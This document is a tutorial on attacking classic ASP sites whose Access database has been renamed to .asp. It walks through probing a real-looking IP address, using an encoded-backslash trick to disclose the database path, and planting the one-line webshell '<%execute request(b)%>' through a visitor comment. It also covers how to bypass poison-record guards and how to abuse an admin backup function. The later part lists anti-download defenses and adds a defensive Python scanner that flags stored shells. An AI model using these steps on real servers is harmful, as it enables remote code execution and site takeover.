As network security technology has developed, administrators have become more skilled. On Access+ASP sites, in order to stop the database from being downloaded, the .mdb file is renamed to .asp or .asa. Leave aside the fact that merely changing the suffix does not prevent a download (tools such as Internet Express can still fetch the file directly); the real problem is that this opens the door to intruders, who can turn a database with an .asp/.asa suffix directly into a webshell.
I. The idea
Everyone knows that <% %> delimits script in an ASP file: the ASP engine executes only the code between <% and %> and sends everything else to the client as literal output. All the data of an Access+ASP site lives in the database file (the .mdb file). Once the administrator has renamed that .mdb to .asp, any data we submit that contains <% ... %> is stored inside a file the ASP engine will parse, so when we request the renamed database the code between <% and %> is executed. We therefore only need to get a piece of malicious code stored in the database, and the database with the .asp suffix becomes our webshell.
II. Example
Pick any target. First, check whether the database has an .asp suffix. The request http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210 (the %5c is an encoded backslash, the usual trick for making the relative database path resolve incorrectly so that the Jet error discloses the full path)
returns:
Microsoft VBScript compiler error '800a03f6'
'End' is missing
/iisHelp/common/500-100.asp, line 242
Microsoft JET Database Engine error '80004005'
'D:/log_mdb/%29dlog_mdb%29.asp' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
/test/conn.asp, line 18
Requesting http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp (the file name itself contains the literal characters %29, so they must be double-encoded as %2529 in the URL) returns a pile of garbled characters: that is the raw database being served, and a tool such as Internet Express could download it directly (not covered here). Back on the home page there is a visitor comment feature. We register a user and post the following comment:
<%execute request(b)%>
This stores the ASP code <%execute request(b)%> in the database, and the database file is now our webshell. Requesting http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp again, we see at the end of the garbled output:
/iisHelp/common/500-100.asp, line 242
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266
Note: the comment field limits how much we can submit, so the payload has to be short; that is why we use the one-line <%execute request(b)%> (commonly written with the parameter name quoted, <%execute request("b")%>), which takes the code to run from the request parameter b. The 'Type mismatch' error is expected: we requested the page without supplying b, so there was nothing to execute. What matters is that the ASP engine reached and compiled our code, at line 1266 of the parsed file.
III. Other questions and ideas
1. Some administrators rename the suffix to .asp and additionally insert a deliberately invalid ASP snippet such as <%='a'-1%> into the database to block downloading completely. Because that invalid code sits earlier in the file, running the page after we insert our webshell only shows the error from the earlier invalid code and never reaches our shell. This stops some attacks, but it is still risky: as long as we can get error-tolerant code (in VBScript, On Error Resume Next) in front of the faulty code, our inserted webshell code is reached and executed. The caveat is that On Error Resume Next only suppresses runtime errors; a deliberate syntax error stops the page from compiling at all and cannot be skipped this way.
2. Where the suffix has not been changed, that is, the file is still .mdb, we simply download it and read the admin password out of it. After logging in to the admin back end, the database backup function can be used to write a copy of a file under a name with the .asp suffix.
Summary of .mdb anti-download methods
1. Under IIS 6, a file whose extension has no registered MIME type is not served: requesting it returns a 404 'file not found'.
So you can give the database a name with an extension that will never be registered, for example xxxxx.xxxxxxxxxxx, and it cannot be downloaded.
2. If the database is placed outside the web root it can never be reached over the web. For example, if e:/web/ is your website,
put the database in e:/ and point the connection string at it.
3. As described above, rename .mdb to .asp and at the same time insert a record containing the characters <% into a dedicated table. When the file is requested, the ASP engine reports a missing script closing delimiter instead of serving the contents.
4. Alternatively, rename .mdb to .asp and open the file in WinHex. After offset 176 there is a long run of 00 bytes. Overwriting part of that run with a piece of ASP code also prevents downloading, without affecting the database, for example:
<%
response.write("illegal access")
response.end()
%>
Putting a # or a space in the database file name no longer works either: # can be encoded in the URL as %23 and a space as %20, so the file can still be requested.
These naming tricks are therefore no longer useful.
If it is your own server, configure IIS itself:
Create a new empty DLL file, then add an application mapping in IIS with that DLL as the executable and .mdb as the extension. Save and restart the IIS service. Requests for .mdb files are now handed to that mapping instead of being served as static files, so the database cannot be downloaded.
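Pulling the whole page together, here is a scanner that walks a web root, recognises Access/Jet databases by their file header rather than by their extension, and models what asp.dll would do with each one: serve it raw, execute a stored one-line shell like the one in section II, stop on a poison record containing a stray <% (item 3 above), or hit a response.end guard placed before the shell (item 4 above, and item 1 of section III). This is an added example written for this edition, not code from the original article or from any tool it mentions. The list of script-mapped extensions, the directory layout, and the sample bytes built by fake_mdb() are assumptions or constructed data; the Jet header signature is real.

```python
"""Find Access/Jet databases under a web root and work out what IIS's
classic-ASP engine (asp.dll) would do with each one.

Added example for this article, not code from the original page. The
extension list, the sample bytes and the directory layout are assumptions."""
import os
import re
import tempfile

# A Jet 3/4 .mdb (or ACE .accdb) starts with 00 01 00 00 followed by this tag.
JET_MAGICS = (b"Standard Jet DB", b"Standard ACE DB")
# Extensions a default classic-ASP install maps to asp.dll (assumed list).
ASP_MAPPED = {".asp", ".asa", ".cer", ".cdx"}

SCRIPT_BLOCK = re.compile(rb"<%(.*?)%>", re.DOTALL)      # what asp.dll compiles
SHELL_PATTERN = re.compile(rb"\b(execute|eval)\b[\s(]*request\b", re.IGNORECASE)
GUARD_PATTERN = re.compile(rb"response\.end", re.IGNORECASE)


def is_jet_database(data):
    """Recognise an Access database by its header, whatever its extension."""
    return data[:4] == b"\x00\x01\x00\x00" and data[4:19] in JET_MAGICS


def asp_view(data):
    """Model the ASP parser: bytes outside <% %> go to the client as literal
    output (the 'garbled characters' the article mentions); bytes inside are
    compiled as VBScript in file order. A '<%' that is not paired with its own
    '%>' makes the page fail to compile: the anti-download poison record."""
    blocks = [m.group(1).strip() for m in SCRIPT_BLOCK.finditer(data)]
    leftover = SCRIPT_BLOCK.sub(b"", data)
    poisoned = b"<%" in leftover or any(b"<%" in b for b in blocks)
    return {"blocks": blocks, "poisoned": poisoned}


def classify(view):
    """Label every script block, keeping file order, the way a responder would."""
    labels = []
    for block in view["blocks"]:
        if SHELL_PATTERN.search(block):
            labels.append("webshell")
        elif GUARD_PATTERN.search(block):
            labels.append("guard")       # response.end written into the header
        else:
            labels.append("script")      # e.g. a runtime-error poison record
    return labels


def assess(name, data):
    """Verdict for one file already known to be a Jet database."""
    ext = os.path.splitext(name)[1].lower()
    view = asp_view(data)
    labels = classify(view)
    if ext not in ASP_MAPPED:
        verdict = "downloadable"     # served raw if IIS has a MIME type for it
    elif view["poisoned"]:
        verdict = "poisoned"         # compile error: nothing runs, nothing leaks
    elif "webshell" in labels:
        first_shell = labels.index("webshell")
        guarded = "guard" in labels[:first_shell]
        verdict = "guarded-shell" if guarded else "shell-executes"
    else:
        verdict = "exposed"          # any <% %> stored in a record becomes code
    return {"file": name, "verdict": verdict, "blocks": labels}


def scan_webroot(root):
    """Walk the web root and assess every file whose bytes say 'Jet database'."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if is_jet_database(data):
                results.append(assess(os.path.relpath(path, root), data))
    return results


def fake_mdb(*records):
    """Constructed stand-in for an .mdb: a real Jet header, the run of zero
    bytes the article describes, then record text. Not a loadable database."""
    return b"\x00\x01\x00\x00Standard Jet DB" + b"\x00" * 200 + b"\r\n".join(records)


SHELL = b"<%execute request(b)%>"            # the article's one-line shell
GUARD = b'<%\r\nresponse.write("illegal access")\r\nresponse.end()\r\n%>'


def demo():
    """Lay out four constructed files in a temporary web root and scan them."""
    with tempfile.TemporaryDirectory() as root:
        cases = {
            "plain.mdb": fake_mdb(b"user=admin;pass=..."),
            "renamed.asp": fake_mdb(b"nice site!", SHELL),
            "guarded.asp": fake_mdb(GUARD, b"nice site!", SHELL),
            "poisoned.asa": fake_mdb(b"<%", b"nice site!", SHELL),
        }
        for name, data in cases.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return {r["file"]: r["verdict"] for r in scan_webroot(root)}


if __name__ == "__main__":
    for file, verdict in demo().items():
        print(f"{file:14} {verdict}")
```

Run it and it prints one verdict per constructed file. The guarded case mirrors item 1 of section III: the shell is stored but unreachable unless error-tolerant code runs first. A runtime-error poison such as <%='a'-1%> cannot be judged statically and is labelled plain script; a stray <% is treated as fatal because asp.dll never finishes compiling the page.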